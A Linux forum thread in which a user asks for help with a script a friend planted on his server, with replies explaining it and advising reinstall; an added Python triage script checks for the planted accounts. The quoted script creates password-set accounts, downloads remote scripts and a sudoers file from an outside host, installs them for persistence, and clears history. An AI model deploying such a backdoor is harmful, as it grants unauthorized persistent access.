Fedora Linux Support Community & Resources Center
  #1  
Old 30th October 2007, 05:59 AM
fedorafan2
Registered User
 
Join Date: Dec 2005
Posts: 277
Server Hacked

This guy I know hacked my server using a live distro at a party at my house. He changed the root password and might have installed a rootkit. I was looking at the server and noticed this file; can anyone tell me what it is and what to do? I deleted all the files it references for download at the bottom.

#!/bin/bash
if [ `grep -c -e '\bcron\b' /etc/group` -eq 0 ] ; then
groupadd cron
fi
if [ `grep -c -e '\bpostalias\b' /etc/group` -eq 0 ] ; then
groupadd postalias
fi
if [ `grep -c -e '\tux\b' /etc/group` -eq 0 ] ; then
groupadd tux
fi
if [ `grep -c -e '\bsaslauthd\b' /etc/group` -eq 0 ] ; then
groupadd saslauthd
fi
if [ `grep -c -e '\byum\b' /etc/group` -eq 0 ] ; then
groupadd yum
fi
if [ `grep -c -e '\bcron\b' /etc/passwd` -eq 0 ] ; then
useradd -gcron cron
fi
echo "cron436" | passwd --stdin cron
if [ `grep -c -e '\bpostalias\b' /etc/passwd` -eq 0 ] ; then
useradd -gpostalias postalias
fi
echo "postalias436" | passwd --stdin postalias
if [ `grep -c -e '\bsaslauthd\b' /etc/passwd` -eq 0 ] ; then
useradd -gsaslauthd saslauthd
fi
echo "saslauthd436" | passwd --stdin saslauthd
if [ `grep -c -e '\bispconfig\b' /etc/passwd` -eq 0 ] ; then
useradd -gtux ispconfig
fi
echo "ispconfig436" | passwd --stdin ispconfig
if [ `grep -c -e '\bxds\b' /etc/passwd` -eq 0 ] ; then
useradd -gcron xds
fi
echo "xds436" | passwd --stdin xds
if [ `grep -c -e '\bvncservd\b' /etc/passwd` -eq 0 ] ; then
useradd -gsaslauthd vncservd
fi
echo "vncservd436" | passwd --stdin vncservd
if [ `grep -c -e '\bhttpd\b' /etc/passwd` -eq 0 ] ; then
useradd -gtux httpd
fi
echo "httpd436" | passwd --stdin httpd
if [ `grep -c -e '\bpostfixd\b' /etc/passwd` -eq 0 ] ; then
useradd -gyum postfixd
fi
echo "postfixd436" | passwd --stdin postfixd
if [ `grep -c -e '\bvsftpd\b' /etc/passwd` -eq 0 ] ; then
useradd -gpostalias vsftpd
fi
echo "vsftpd436" | passwd --stdin vsftpd
cd /etc/cron.hourly
curl http://maxweisel.com/ispconfigbind.sh -O
chmod +x ./ispconfigbind.sh
cd /usr/bin
curl http://maxweisel.com/ispconfigbind.sh -O
chmod +x ./ispconfigbind.sh
cd /etc/init.d
curl http://maxweisel.com/ispconfigbind -O
chmod +x ispconfigbind
chkconfig ispconfigbind on
cd /etc
curl http://maxweisel.com/sudoers -O
history -c
  #2  
Old 30th October 2007, 06:50 AM
pobbz
Registered User
 
Join Date: Apr 2005
Location: Finland
Posts: 190
Hello.

It seems to me that it adds some users to your system. I might be wrong though.

Anyway, wtf? The guy changed the root password? Then, what's the point of installing a rootkit, if you at the same time make it very clear that the box has been hacked?

AFAIK, the purpose of rootkits is to prevent the server owner from finding out that his box has been compromised. Changing the root password kinda nullifies the whole idea of a rootkit.

If I were you I'd do two things:

1. Commit to a clean reinstall.
2. Kick the **** out of the guy.
  #3  
Old 30th October 2007, 07:10 AM
marcrblevins
Registered User
 
Join Date: Jun 2006
Location: Texas
Age: 42
Posts: 4,168
No, number 2 is report the hacker to the police. He might have wanted to steal your identity, etc.
  #4  
Old 30th October 2007, 07:43 AM
leigh123linux
Retired Administrator
 
Join Date: Oct 2006
Posts: 21,509
Quote:
Originally Posted by marcrblevins
No, number 2 is report the hacker to the police. He might wanted to steal your identity, etc.
How can he do that? He invited the hacker into his house and left him unattended with his PC.


I don't let any mother fu*ker near my machine
  #5  
Old 30th October 2007, 08:24 AM
Iron_Mike
Registered User
 
Join Date: Jul 2005
Location: Ft Huachuca, AZ
Posts: 3,762
Almost any box can be hacked if given physical access to the box. So to be on the safe side, rebuild the server box and don't let anyone screw with it.
  #6  
Old 30th October 2007, 08:28 AM
marcrblevins
Registered User
 
Join Date: Jun 2006
Location: Texas
Age: 42
Posts: 4,168
Another thing, change your BIOS to not boot from floppies or any CD/DVD drives. My first device to boot is the hard drive. Turn on BIOS password as well.

Then this hacker would have to break in the hard way: take the door off, reset the BIOS, and so the story goes on.
  #7  
Old 30th October 2007, 06:26 PM
contraculto
Registered User
 
Join Date: Mar 2007
Location: Chile
Posts: 283
Quote:
Originally Posted by Iron_Mike
Almost any box can be hacked if given physical access to the box. So to be on the safe side, rebuild the server box and don't let anyone screw with it.
And get a big evil-looking dog :P
  #8  
Old 31st October 2007, 03:01 AM
fedorafan2
Registered User
 
Join Date: Dec 2005
Posts: 277
Can anyone tell me what the users he created are? I know the person who hacked it; he is a good friend and thinks it is really funny. He told me the root pass and didn't install a rootkit, but he put those little files on there so he can do stuff just to annoy me. He also said the sudoers file is important to keep but to delete the lines he added. Is this true, and if so can someone tell me where I can get a good file?
  #9  
Old 31st October 2007, 07:55 AM
marcrblevins
Registered User
 
Join Date: Jun 2006
Location: Texas
Age: 42
Posts: 4,168
Forget it, reinstall.
  #10  
Old 31st October 2007, 08:28 AM
pobbz
Registered User
 
Join Date: Apr 2005
Location: Finland
Posts: 190
Quote:
Originally Posted by marcrblevins
Forget it, reinstall.
Yes, I second that. And set the BIOS to boot only from HD and then set a BIOS password.
  #11  
Old 1st November 2007, 01:07 AM
casket88
Registered User
 
Join Date: Sep 2007
Posts: 114
Put a lock on your case too.

All someone needs is a screwdriver and 2 extra minutes of time to bypass the BIOS password and be able to boot from the live CD. The only way to get past this is to sneak in some bolt cutters or an angle grinder, and if he can, well, you deserve to be hacked.
  #12  
Old 1st November 2007, 03:15 AM
ChrisSavery
Registered User
 
Join Date: Oct 2007
Posts: 34
You can read the script. He adds groups and users. He sets passwords. He downloads the ispconfig file several times (though why doesn't he just download it once and copy?). He first puts one in the hourly cron so it will run every hour, then he puts one in /usr/bin so it's easy to run at the command line, then he puts one in init.d and sets it as a daemon so it's always on and will start at boot. He really, really wants that program to run. So if you want to know what he's up to, then look at that script. If you are convinced you don't want to reinstall, then at least remove that script from the places it was installed and run chkconfig again with off to disable it. But really you have no idea what else he may have done, and whether this stuff is just a diversion. So, as people say here, the only safe way to deal with this is to reinstall.
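As an added triage example (not posted by anyone in this thread), a small Python script that audits passwd, group and sudoers content for the account names the quoted script creates, flags which of them are login-capable, and lists the paths the script drops files into. The sample file contents are constructed, and the sudoers grant line is a hypothetical illustration of the kind of line the poster was told to delete.

```python
# Account and group names created by the script quoted in post #1.
SUSPECT_GROUPS = {"cron", "postalias", "tux", "saslauthd", "yum"}
SUSPECT_USERS = {"cron", "postalias", "saslauthd", "ispconfig", "xds",
                 "vncservd", "httpd", "postfixd", "vsftpd"}
# Files the script drops (paths taken from its curl/chmod lines).
DROPPED_FILES = ["/etc/cron.hourly/ispconfigbind.sh",
                 "/usr/bin/ispconfigbind.sh", "/etc/init.d/ispconfigbind"]

def find_suspect_accounts(passwd_text, group_text):
    """Suspect users present in passwd as (name, uid, shell) tuples,
    plus suspect group names present in group; both sorted."""
    users = []
    for line in passwd_text.splitlines():
        f = line.split(":")
        if len(f) == 7 and f[0] in SUSPECT_USERS:
            users.append((f[0], int(f[2]), f[6]))
    groups = [g.split(":")[0] for g in group_text.splitlines()
              if g.split(":")[0] in SUSPECT_GROUPS]
    return sorted(users), sorted(groups)

def login_capable(users):
    """Names that can actually log in: useradd defaults give UID >= 500
    and a real shell, unlike a genuine service account (/sbin/nologin)."""
    return sorted(n for n, uid, shell in users
                  if uid >= 500 and not shell.endswith(("nologin", "false")))

def sudoers_grants(sudoers_text):
    """Non-comment sudoers lines whose subject is a suspect user or %group."""
    hits = []
    for line in sudoers_text.splitlines():
        s = line.strip()
        if s and not s.startswith("#") and \
           s.split()[0].lstrip("%") in SUSPECT_USERS | SUSPECT_GROUPS:
            hits.append(s)
    return hits

# Constructed sample data, not real files from the poster's server.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
apache:x:48:48:Apache:/var/www:/sbin/nologin
cron:x:500:500::/home/cron:/bin/bash
xds:x:501:500::/home/xds:/bin/bash
"""
SAMPLE_GROUP = "root:x:0:\napache:x:48:\ncron:x:500:\ntux:x:502:\n"
SAMPLE_SUDOERS = "root ALL=(ALL) ALL\n# Defaults\nxds ALL=(ALL) NOPASSWD: ALL\n"

if __name__ == "__main__":
    users, groups = find_suspect_accounts(SAMPLE_PASSWD, SAMPLE_GROUP)
    print("suspect users:", users, "suspect groups:", groups)
    print("login-capable:", login_capable(users))
    print("sudo grants:", sudoers_grants(SAMPLE_SUDOERS))
```

On a real box, feed it the contents of /etc/passwd, /etc/group and /etc/sudoers and also check each path in DROPPED_FILES plus the chkconfig state of ispconfigbind; a clean hit list still does not prove the host is clean, which is why the thread's advice to reinstall stands.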